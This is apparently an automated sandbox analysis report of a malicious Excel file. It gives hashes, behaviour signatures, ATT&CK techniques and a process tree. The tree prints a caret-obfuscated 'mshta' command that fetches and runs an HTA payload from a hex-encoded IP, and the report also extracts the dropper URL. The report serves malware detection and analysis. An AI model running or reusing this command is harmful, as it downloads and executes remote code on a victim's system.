Analysis

  • max time kernel
    117s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    28-01-2022 01:47

General

  • Target

    file-1.xls

  • Size

    64KB

  • MD5

    be6c14686243f70182f1b46492197f43

  • SHA1

    56be88f03cddb41f01cde7839441aef10817e364

  • SHA256

    01f595d0e040fa2450c3a453aa31cab55a53e706896cf7446a6549c69c25a83a

  • SHA512

    dbef867376fe6dea0414a8f82b21d264921365865e2c1acbe5fd314c2dfd2286e5002af0289869acf0e5b60485d420e8f582292c90e727c4b0eea3939b2746e4

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xc12a24f5/cc.html

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\file-1.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1752
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xc12a24f5/cc.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:288
      • C:\Windows\SysWOW64\mshta.exe
        mshta http://0xc12a24f5/cc.html
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        PID:1236

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1752-55-0x000000002FD11000-0x000000002FD14000-memory.dmp
    Filesize

    12KB

  • memory/1752-56-0x00000000718F1000-0x00000000718F3000-memory.dmp
    Filesize

    8KB

  • memory/1752-57-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/1752-58-0x0000000076B81000-0x0000000076B83000-memory.dmp
    Filesize

    8KB

  • memory/1752-60-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB